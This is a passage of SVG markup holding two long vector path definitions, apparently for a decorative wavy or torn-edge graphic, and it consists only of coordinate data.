d=\"M1864.2,74.7c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-7.6.9,3,2.8-3.5,3.8,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.63,41.63,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.15,98.15,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,3.3.1,1.3-.3,4-.2s2.4.6,4.8.8a21.32,21.32,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C1861.8,75.1,1862.3,74.8,1864.2,74.7Z\"></path>\n        <path d=\"M0,0V30.7c.9,0,1.9,0,3.1.1l.4.4c13.8.4,10.5-.4,11.6-1,12.1.7,5.8,1.4,4.9,2.4a27.94,27.94,0,0,0,6.9-.1c8.1.9-6.5,1.7,5.1,2.6.3-.3,1.4-.6,3.4-.9.4,2-2.5,2.8,0,4.8-2-.1-2.5-.2-4.4-.3,1,.5,6,.7,6.7,1.2-1.7,0-4-.1-4.1,0,2.2.1,1.2.3.3.3,4.7.2,1.6-.3,5.4-.2,6.6.8.6,1.5,6.4,2.5-4,.1-3.4.6-6.2.8,6.4.3,8.8.1,11.7.6-6.2.1-12.2.4-17-.4.1.2-3.9,0-4.1.1,7.4.1,6.3.8,6.8,1.4,6.2.1,7.2.9,3.5.8,3.1.2,5.3.4,4.8.8-7,.3-7.5-.5-10.2-.6,1.1.3-1,.8,2.3,1,1.2-.6,2.7.6,8.5.2.2-.2-3.3-.2-4.6-.5,5.4.1,7.6.3,8.9.6-1.4.4-10.5.1-12.4.2,2.4.3-2.8.7,3.8,1.2-4.2-.6,1-1.3,7.6-.8.8.5-5.4,0-5.4.2,1.9.3,5.4,1.1-3.6.7,2.4.5,5.6.5,10.1.4,1,.5-4.4.3-6.9.1,1.3.3-2.6.2-2.4.4,4.3.3,7.7,0,11.3.3-.2.2-3.6.1-5.4.2,1.4.4,5.6.7,5.2,1.2-9.4,0,.6.7-7.5.9,3.5.1,4.3-.1,5.8.2-.2.2-5.2,0-5.4.2,3.5.1,6.9.1,7.3.4-.9,0-1.6,0-1.3.1-1.46-.17-2.93-.27-4.4-.3,5.4,1.5,6.2,1.8-3.4,2.4,6.2.3,4.5.9,2.4,1.1,4.4,0,4.5.3,7.3.4-1.9-.6,3.9-.2,6.9-.1,1.8-.4-.6-.6,2-.9-4.5-.1-3.8-.5-6.2-.7,3.2,0,4.6-.2,6.7-.3-3.4-.1-5.3-.9-3.6-1,3.5.2-.1.8,6.3.8-3.2-.6,1.6-.4,4.1,0,.1-1.4.4-1.3-2.2-2.6,3.3,0,6.2.4,8.6.3-7.9-.4,1.2-.9,1.6-1.4.4.2-.1.4,1.8.5,4.2-.1-.6-.3,3.9-.4a8.16,8.16,0,0,0,2.7,0c-4.5-.3-5.6-.2-8.7-.4.4-.9,2.8-2.3,16-2.4-3.9.4,4,1-1.6,1.4,3.4,0,3.3.3,7.2.3,1.8-.6,1.3-1.1,4-1.8a13.45,13.45,0,0,0,4.2,0c-1.7-.1-3.4-.1-3-.3a13.45,13.45,0,0,0,4.2,0c-2.7,0-5-.6-1.9-.6,1.5.7,8.8.3,11.8.8.5.5-8.1.1-5.2.4.8-.1,4.4.2,5.5-.1.9.2,6,.7,2.1.8a44.26,44.26,0,0,0-8.3,0c4.7-.1,8.5.1,11.3.3.3.5,2.4,1.2-3.2,1.1a55.14,55.14,0,0,0-5.9-.4c-1.8.3,4.9.2,4.5.4.4.2-.2.4,1.8.5,3.3-.1-2.8-.5,2.3-.5-.8.4,2.5.5,2.1.8-4.2-.1-4.1.2-8.3,0,.8-.3-5.5-.3-5.8-.2,2.3,0,1.7.8,4.5.4-1.4,0-2-.2-.2-.2.2.2,4,.2,4.4.3-1.5.1-1.4.4-3.8.5-2.3-.1-1.1-.3-3.1-.4-4.8.2,11.3,1.2-.4,1.1-.9-.2,1.2-.5-1.9-.6-4.3.3.3.8-3.2,1.1,3.2,0,5.4.1,5.9.4-4.2-.1-5.4.3-2.2.6-2.7.2-4.7-.2-7,0,3.8.1,3.6.7,4.8.8,0-.1.2-.3,2.6-.2,2.8.3-.9.3.6.7,5.3.2,2-.4,5.2-.4-.9.6,4.4.2,4.3.2,5.7.4-1.8.6-5.1.5,5.5,0,10.2.6,11.3.1-6-.3,2.2-.4-3.5-.8,3.3.1,5.3.1,5.5-.1-3.1-.3-5.9.1-7.3-.4,1.7-.9,14.3.1,13.1.7,2.7-.2,1.8-.2.8-.6,4.9.5,3.1-.1,5.4-.2,3.3.3-.1,1.1,5.3,1.3-.3-.7-1.8-1.4-.1-1.6,7.8.6,4.1,1.4,9,2.3-3.3-.1-5.3-.1-5.5.1,3,.3,2.4.9,5.2,1.2-6.1-.1-2.8.6-2.1.8,1.2-.1,10.6.2,6.8-.2.6.2-4.1-.1-4.3-.2a7,7,0,0,0-1.7-.4c6.7,0,.8-.6,6.4-.6-2.7-.1-3,.1-5.6,0,3.6-1.1,2.1-1.4,3.7-2.1-5.2-.7-7.4-1.9-2.1-2.3a36.81,36.81,0,0,1-4.2-.1c4.8-.1.5-.5.5-1,2.7,0,6.1.1,5.4-.2-6.8,0-4.7-.6-1.9-.6a15.66,15.66,0,0,1-2.9-.2c4,0,5.7.7,7.3.4-3-.1-.8-.5-4.7-.5-.8.1-2.9.1-5.5.1-.3-.3-.5-.6-.8-.9-4.9.1-7.9-.3-9.6.1,3.4.1,2.9-.1,7,0-.2.3,1.2,1-4.9.8,4.4.1-2.6,1.2,4.9.9,0,.2-.6.4-2.4.4-4.5,0-6.7-.2-10-.3a19.29,19.29,0,0,1-3.7.6c-.2-.2-4-.2-4.4-.3,1.6-.2-4.6-.6-.5-.6,2.7.1,1.3.4,4.5.4-.4-.3,4.2-.2,2.2-.7-7.8-.4-10.8-2-1.4-1.6-3.2-.6-2.8-.8-7.4-.5,2.5-.4.2-1.1-3.7-1.1,2.7,0,.7-.3,4-.2,2.9.1-.3.6,4.7.7,4.1.1-1.9-.8,2.2-.7-.2.3,5.6.2,4.6.5-4.3-.3-4.6.1-2.4.4-2.7-.3-4.9-.1-4,.2a36.19,36.19,0,0,1,8.7.4c-.6-.7,1.3-1.3,1.2-1.8-.5.2-3.1-.4-6-.5-2.6-.9,3.7-.9,1.2-1.8,2.4.4,5.6-.1,7.2.3-4.3-.1-3.3.8-2.1.8a15.37,15.37,0,0,1,2.8.1c-5.2-1.2,11.7-1,9.7,0a52.3,52.3,0,0,0-5.6,0c1.1.3-1.6.7,3.4.7-3-.9,6.9-.1,10.6-.6-.7-.1-6.1-.1-7.4-.5,3.4-.2,8.1.3,9.8.1-2-.4-6.1-.3-8.8-.5.5-.4,4.6-.6,6.9-.1-.5-.3.3-.4,2.3-.5.1.1,2.6.2,3.1.3.2,1-.3,1.7-1.5,2.4.8-.1,2.1-.1,2.2.1-.1.3-1.4.5-3.7.6,5.7.1,3.2.1,3.1.4,2.7.1,3-.1,5.6,0,.4.7,4.7,1.3,0,1.5a82.23,82.23,0,0,0-11.1,0c-5.7-.9,2-1.7-.7-2.3-3.4.1-2.3.7-6.3.7-.4-.8,7-.9,7.1-1.4a73,73,0,0,0-12,.6c-8.2,0-2.8-1-11-1.4,1.3.6,3.9,1.3,10,1.9-6.8.2-5.2.7-7.2,1.3,5.5-.1.8-.3,8.4.1,1.7-.2-4-.5-.4-.4s2.8.6,6.3.8c-2.3.2-2.9.3-.8.6,3.4.1,5.3-.5,9.7,0-3.8.4.5.2,2,.7-1.3.3-4.8-.1-5.3.3,4.5,0,8.1.8,4.9.9-2.7-.1-1.3-.4-4.3-.2,6.3.5,1.5.8,7.8.9-4.2.4,2,.7-1.8,1.2,3.7.2,4.4,0,5.8.2-4.6.2,6.1.7.8.9-.3-.1,0-.3-1.7-.4,2,.7-5.3-.1-5.3.3,9.2.5,10.2,2.1-3,1.4,1-.2-1.8-.7-3.1-.4,2.1.1,1.5.3,1.8.5,7.2.4,11.5.7,7.9,1.1-1.6-.1-6.9-.6-8.6-.3,7,.2-1.4.4-.8.6a53.87,53.87,0,0,1,8.8.5c2.1,0,5.4-.4,6.8-.2.1.3-2.3.3.5.6-1.9,0-3.8-.1-5.7-.1,8.3,1.1,3.6,1.5,2.1,2.3,5.1.2.2.4,3.3.6a13.76,13.76,0,0,1,4.1-.1c1.5.5-6.6.4-2,.9-3.2-.1-5.3-.1-5.5.1,5.4.1,1.4.5,7.3.4-2.8.2.7.4,2,.7,4.9-1.5-2.8-3.3,4.1-4.8a36.81,36.81,0,0,1-4.2-.1c-.9-.5,4.3-.6,1.8-1.2-6.7-.2,1.3.4-2.5.3-5.1-.5-2.2-.8-2.6-1.4a43.87,43.87,0,0,0,5.5-.1c-.8.4-6.2.4-.6.8-.5-.3,3.8-.6.7-.9,1.2-.1,1.3-.3-.4-.5.1.3-4.7-.1-4.4-.2,2.8-.3-3.1-.7,2.1-.7.5.4-.6.8,4.9.9-.1-.7-1.3-1,1.7-1.3-3.1,0-4.6-.2-4.5-.4,7.5-.2-1.9-1.3-4.2-1.6,3.7-.1,5.6-.3,7.9-.5a36.81,36.81,0,0,1-4.2-.1c0-.3,3.3-.4,5.1-.5-7.7-.2-3-.4-6.4-1,2,.1,2.5.2,4.4.3.6-.4-2.7-1.1.3-1.2a33.79,33.79,0,0,1,4.5.3c1.4-.1.1-.4,4-.2-1.5-.2-1-.6-3.4-.7-3,.1-2.7.6-7.9.5,1.7-.4,2.9-.1-1.8-.5,4.1,0,4.6-.5,8.4.1-.2-.3-1.4-.7,2.3-.6,1.3.3,3.4.5,3.5.8a43.14,43.14,0,0,1,8.8.5c1.9-.3-1.5-.6-4.9-.9a13.45,13.45,0,0,1-4.2,0c1.9-.2-1.8-.4,2.4-.5-2.1-.1-5.2-.1-5.8-.2.6-.1,1.3-.2,2.5-.3,8.9.5,11.6,1.1,12.7,1.8,2.1.1,7.2,0,7.2.3-1.9,0-1.1.2-2.6.2-4.9,0-7.5-.4-8.4-.1,15.2.5,10.2,1.8,7.5,2.2-.1.3,3.8-.2,4.4.2-.7.4-3.7.9-1.7,1.3-1.6,0-4.1-.1-4.1,0,10.7.6-1.5,1.9,3.5,2.4-.2-.1.4-.3,1.3-.1.5.4-7,0-6.6.4,3.4.2,5.8-.3,7,0-4.7.1.2.1,1.8.5-3,.1-2.2.6-5.2.4,10.3,1-1.4,1.7.7,2.4-5.3-.1-5.1.3-6.4.6,5.3.2,2.2-.5,6.6-.4-1.7,1,5.6,2.5,10.1,3.6-3.8,0-3.1-.3-5.9-.4-.7.4,5.6.4,6.2.7-5.7.4-13.7.9-4.1,1.7.1-.2-.9-.4,1-.4.2.3,7.9,1.3,1.4,1.6-2-.2-5.4-.2-6-.5,1.8,0,2.4-.2,2.4-.4-4.4,0-4-.4-7.4-.5-1.7.4,4.1.3,3.3.6-3.9-.1-3-.2-5.7-.1,3.3.2,4.4,1,7.7.8-6,.2,3.5,1.2-2.9,1.5-3.6-.2,3.3-.5-3.3-.6-.8.2-.5.6.8.9,6.3.2-1.3-.2,2.6-.2,6.2.1,5.4,1.2,9.2,1-6-.8-.1-1.5-5.7-1.8,3.7-.2,4.2-.6,9.1-.7.1.4.8.3,2.3,1-4.2,0-13.5.6-2,.8-1.5-.4.9-.5,3.8-.5-3.1.3,4.8.6.8.9,6.3.1.8-.9-1-1.1,1.8,0,2.1.2,4.4.2-3.6-1.5.8-2.2,5.5-3.3-7.3-.2-4,.6-10.6.5-.1-.1-1.3-.2-1.6-.3,4.5.1,4.5-.3,3.6-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.5-.6.8-1.1-3.9-1.3,2.9.1-3.7-.8.7-.7.9.1,4.7.5,5.8.2-4.4-.3-4.7-.8-5.3-1.3a53.22,53.22,0,0,0,6.8-.2c-2.5-.4-6.4.1-8.6-.3,5.5-.1.3-1,7.4-1.1-3.6,0-5.2-.2-4.6-.4,1.7.1,9.6.4,5.7.1-5.1,0-4.2-.9-.7-.8-.2.9,8.5.6,10.9,1.3a24.32,24.32,0,0,1-2.7,0c-2.8-.1-2.1-.3-5.9-.3-.3.5-3.8.4.8.9a45.4,45.4,0,0,1-6.9.1c-.2.4,7,.4,7.6.7.3.3-2.2.3-.8.6-1.4,0-2.8-.1-4.2-.1,3.2.6-.3.2,4.9.9-1.5.4-5.5.4-9.4.3,1.2.2,7.9.1,8.7.4.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c4.6.2,4.2-.1,7.1.2-4.9-1.3,3.4-2.1-2.9-3.2,1.6-.1,3.7-.1,7,0-1.5-.6-2.7-1.1-4.5-.4-.9-.2-2.3-.3-3.2-.5,6.2.1,6.6-.4,2.3-.5,5,.1-3.3-.4,1.1-.3,4.4-.1,3.8.6,6.5,1,3.9-.3-1.6-1.2-2.9-1.7,6.4.6-.6-.8,3.5-.8,2.4.1,3.5.8,6,.5-4.7-.5-2.6-1-9.7-1.5,9.2-.4-10.1-2.1,1.8-2.7-4.4-.3-2.6-.8-.9-1,3.2.1-.2.6,6.1.6-.8-.4-3-.7-6.3-.9.2-.2,3.6-.1,3.9-.3-2.6-.1-5.4-.7-3.3-.6,1.7.1,1.7.2,1.7.4a29.51,29.51,0,0,0,5.4-.2c-2.1-.1-5.2-.1-5.8-.2a76.33,76.33,0,0,0,12.9-1.1c-7.2-.2,2.2-.6-6.2-.7,0,.4,4.5,1.1-.9.5-3.2.2,2.6.7-.6.9-.9,0-1.9,0-2.9-.1-1.2-.6,6.9-.8,1.5-1.5-.1.1.5.3-1.1.3-.1-.1-1.3-.2-1.6-.3.4-.2,5.4,0,3.9-.3-7.6.2-.1-1.1-10.9-1.3,5.1-.1-1.1-.2-.6-.7a24.32,24.32,0,0,1,2.7,0c2.6.1,5.3.7,7.3.4-3.5-.1,0-.7-4.8-.8,1.2.2-2.4.4-2.6.2-1.8-.5,8.2-.3,2.1-.8a8.77,8.77,0,0,1-2.8,0c4.1-.4.9-.9,1.6-1.4,2.1.3,2.2.8,6.5,1-1.4-.5.1-.7,3.5-.8-5.1-.2-7,.1-8.6-.3,4.2.1,1.1-.6,5.1-.5-4.8.1-7.6-.5-8.6-.3,5.3.4-3.5,0-2.6.2,2.3,0,2.8.7.5.6.4-.3-3.5-.9-4.7-.7,3.5.1.6.4-1.1.3-3.3-.3.4-.3-.6-.7-2.7-.2-4.5.2-5.7-.1.6-.6,4.6-1,1.1-1.9,3.8.5,5.1-.5,8.3,0-2,.2-3.5.8,2.4,1.1-2-.6-3.2-1.6,1.2-1.8,2.1.7,1,.8-1.7,1.3,7.7.1,9.3.4,17.3.7.8-.3-4.6-.9-4.9-.8-1.6.2,5.9.5,1.8.5a36,36,0,0,1-7.6-.7c4.5-.1.6-.4,2.1-.8,5.7.3,2.7-.2,5.4-.2,2.8.3.4.3.5.6,8.8.1-.3-.4-.7-.8,2.5,0,4.4.1,5.8.2a9.4,9.4,0,0,0-3.2-.5c-1.5.5-12.5-.4-10.5-.9a54.5,54.5,0,0,1,7,0c.1-.2-1.8-.3-1.8-.5,5.1.1,3.5-.4,8.1-.3-2-.5-.4-.5-4.8-.8-4.1,0-.1.4-2.5.4-2.2-.1-5.6-.7-2-.7,4.6.1,7.7.5,8.3,0-7.3.1-1.1-.2-4.5-.4a87.83,87.83,0,0,1-9.6.1c-1.1-.7,1.9-.8,1.7-1.2,1.8.3,1.6.8,5,1,4.9-.4-3.4-1.4,2.8-1.6-3.5.4,3.8.5,6.3.9,1.7-.2,4.5.3,5.6,0a41.63,41.63,0,0,1-6-.5c4.4,0,6-.5,9.5-.2-2.3-.6-8.7-1.4-.2-1.8,1.5.2-3.9.3.4.4a3.3,3.3,0,0,1,1.4,0c.8.3-6.5-.2-4,.2,7.2.3,6.1,1.1,9.8,1.6-3.9-.2-2.6.2-4,.2,3.4-.1,3.9.6,5.8.2-5.3-.3,2.2-.3.9-.5-6.7-.3,1.5-.7-3.9-1.3,2.1.1,5.2.1,5.8.2-.4.1-3.1.3.4.4.2-.3,1.9-.4.7-.7-2.5,0-3.4-.2-3.1-.4a42.45,42.45,0,0,1-7.3-.4c4.4,0,6,.4,7,0-6.1-.3-10.4-.7-14.8-1.1a37.36,37.36,0,0,0,5.5-.1,4,4,0,0,0,1.6.3c-1.9-.6,4.9.3,5.5-.1-9.7-.4-2.6-.4-9.2-1,4.7.2,3,.2,5.6,0,.7.6.3.1,4.3.2.1.1,1.3.2,1.6.3-4.1-.3-3.5.4-1,.4a83,83,0,0,1,8.5.2,36.57,36.57,0,0,0-8-1.2c.8-.5,1.5-.9,7.8-.6.5.3-2.9.2-3.9.3,3.9.5,5.4,1,8.2,1.4-2.5-.4,5.9-.2,5.6,0-1.6.3-5.8.7-.7.7-7.8,0-4,.8-10.4.7-.3.4,3.9.5,6.2.7-3.6-.1-1.9.4-3.8.5a38.81,38.81,0,0,0-6.9.1c4.4.1-2,.7,1.8.5.6-.1,1.3-.2,2.5-.3-.4.3,2.4.5,3.4.7,4.8.2,1.8-.4,8.2-.1-.6.2-.3.4-2.4.5-1.1-.3-2.5.2-5.5.1,2.2.5.4.5,1,1.1,7.5.2.4-.5,2-.9,10.8.2,9-.7,17.4-.7-1.7-.4-6.7-.5-2-.7-2.3-.1-4.7-.1-7.1-.2-.4.3,4.6.3,3.4.7a17.57,17.57,0,0,1-3.9.4,30,30,0,0,1-3.6-1c4.5.1,1.7-.4,4.3-.4-8.9,0-4.1.8-12.1,1,1.8-.5,2.6-1.3,12.5-1.6-.5-.2-2.3,0-2.9-.2,1.4,0,1.6-.2-.2-.2.9.2-3.3.5-4,.2,1.8-.2,1.7-.7,4.9-.8,2.9.1,1.7.4,4.6.5.6-.1,1.8-.2,2.5-.4-2.8-.1-9.4-.5-4.8-.7,2.7.7,2.1-1,9.3-.4-.8-.3-4.8-.4-3.5-.8,6.2.4,2.4-.1,5.4-.2,3.2,1.3,6.6,3.1-2.7,3.2,1.8.7,1,1,2.7,1.5,1.9,0,3.2.1,4.3.2-.5-.4,6-.1,6.6-.4-4.1,0-6.9,0-8.5-.2.9-.3-4.8-.7-.7-.8,1.7.2,1.9.4,2,.7,5.3,0,11.5-.5,7.4-1,.1.3.2.6-3.8.5.7-1.4-7.4-3.4,9.8-3.1-5.5-.3,7.8-.3.7-.7-1.4.1-.1.4-4,.2-1.1-.5-.4.1-4.3-.1a5,5,0,0,1-.6-.7c-6.1-.2-4.2.4-9.4.3,3.8-.7,20.4-1.5,5.1-2.1,0-.1-.1-.1-.2-.2,3.4-.1,6.2.5,7.1.2-2.2-.1-4.6-.3-4.6-.5,6.3.2-1.7-.6,2.1-.7,6.8.6,6.8,1.5,6.1,2.2,1.6.1,2.3.2,3,.3,5.8.3,7-.3,9.8.1-2.6.2-2.7,0,.3.3-3.9,0-5.2.3-4.9.8,7.7.2-.3-.4,3.8-.5,8,1.3-1.1,1.5,2.4,2.7,6.5.3,3.7.7,10.4.8-5.3,0-8.5.3-11.3-.3-1,.3,4.5.9,6.2.7-1.2-.2,3.8.3,3.9-.2a21,21,0,0,1,4.8.8c-2.5.1-2.6-.1-7.1-.2-.4.4-.5.3.7.8,1.9.3,5.1-.1,7.2.3a40.53,40.53,0,0,0-6.4.6c9.2.7,4.1,1.5,4.8,2.3-3.3-.1-9.6,0-5.3.2,1.8-.1,4.6-.2,8.2-.1-2.1.3-4.3.4-.6.9-7.5-.2.5.6-5,.7,2.1.1,7.2,0,7.2.3l.2.2c-5.1-.1-7-.4-11.5-.5-1.7.4,6.4.2,4.6.5,4.1.2,3.5-.1,7,0-1,.5,4.6,1.1-1.5,1.5,5.6.2,3,.5,4.8.8-.9.2-7-.2-5.4.2,2.7,0,3.2.2,5.8.2.1-.1.2-.3,2.7-.2,10.2.6,3.7,1.5,3.2,2-.1.1,7.4,1.2-2.3.6,1.7.3,2.9.8-3.7.6.6-.2,3.2-.2,2.3-.6-4.2-.1-5.1-.4-8.8-.5,1.5.5-4-.3-2.5.3.8.4,7-.1,8.6.3a17.63,17.63,0,0,1-3.9.4c-1.46-.17-2.93-.27-4.4-.3-.6.2-3.2.7-.6.9,2.4,0-.6-.5,2.3-.5,2.7,0,11.7.5,2.9.2-.1.4,8.2.3,6.3.8-2.4,0-3.8-.2-4.3-.1.2.4,3.7,0,6,.5a51.1,51.1,0,0,1-5.4.2c4.4.5-2.2,1.3,6.4.9a3.92,3.92,0,0,1-2.3.5c-1.5-.4-2.2-.2-5.8-.2,1.4.6-.8.9-1.6,1.4,3.3.2,5.1-.2,5.7.1-3.6-.1,2.1.2.4.4-2.1,0-5.3-.2-5.6,0,.5.5,3.4,1.1-1.9,1-.9-.2,1.2-.5-1.9-.6-3.9.3,4.3.8,1,1.1,1.9,0,3.8.1,5.7.1,0,.4,5.7,1-3.5.8,2.7-.4-5.2-1-10.5-.9.1.3,1.4.7-.6.9,2.1.3,4.1-.1,5.8.2-2.1.3,6.3,1.5,3.1,1.9,2.8,0,.7-.5,5.2-.4,5.3.9-3.4,1.6-.9,2.2a37.63,37.63,0,0,1,3.8-.5c2.3.6-2,.9-1.3,1.7.1.1,2.6.2,3,.3-.1.5-7,.9-11.7.9,9.5.3,8.4-.3,12.1-.5,3.8.6-3.6.6,1.1,1.2,2.2,0-.8-.6,3.9-.3-3-1-7.2-2,.6-2.5-2.3.7,1.1.3,4.8.8-.2.3-5.2.7-3.4.9a11.09,11.09,0,0,1,2.7,0c3.5.4-2.9.9.8.9-.2-.2.8-.3,2.5-.3,3.9,1.1-2.2,1.4,4.7,2.2-9.4-.1,2.3,1.7-6.9,1.6-1-1.1.2-1.6-2.1-2.4-3.4.1-2.8-.4-4.7-.7-6.5.4,2.1,1.5,4.6,2.1-1.8,0-1.8.1-4.1,0,.6-.4-2.9-.5-2.2-.9-2.4,0-7.6-.2-6.8.2,2.7.1,3-.1,5.6,0a7.57,7.57,0,0,0,.8.9c-9.5,0-9.1-.2-18.5-.5,0-.1,1.7-.1,1.1-.3-10.1-.2-11.8-.9-16.5-1.4-3.8.3,5.7.5,3.7,1.1a21.29,21.29,0,0,0-4.3-.1c4.4,0,1,.6,6.1.6-.4-.3.3-.4,2.3-.5.2.1,2.6.2,3,.3,1.5.4-1.9.3-2.4.5,1.1.1,2.8.1,2.9.2,5.7.2-1.9-.4,5.4-.2,9.1.7,19.7.5,16.6,1.5-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.8,1-2.8,1.5-3,2.9,3.4.2,5.1-.2,5.7.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7-.4.3-4.2.2-6.7.3,2,.2,5.3.2,7.3.4.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a44.62,44.62,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2A60.14,60.14,0,0,1,434,68.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.52,31.52,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0h0c3.1,1.1,11.5,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4h-1.3c-4.1-.1-5.1-.3-4.9-.7a17.46,17.46,0,0,0,5-.3c1.4-.4,1.6-.8,8.3-.4-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-5.5-.6-3.8-2-7.2-3a23.68,23.68,0,0,0-2.9-.6h3a16,16,0,0,0,2.5-.1,15,15,0,0,1-2.4-.2c-1.6-.2-2.7-.3-5.1-.4,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.91,97.91,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.8-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.15,66.15,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7q1.65.3,4.2.6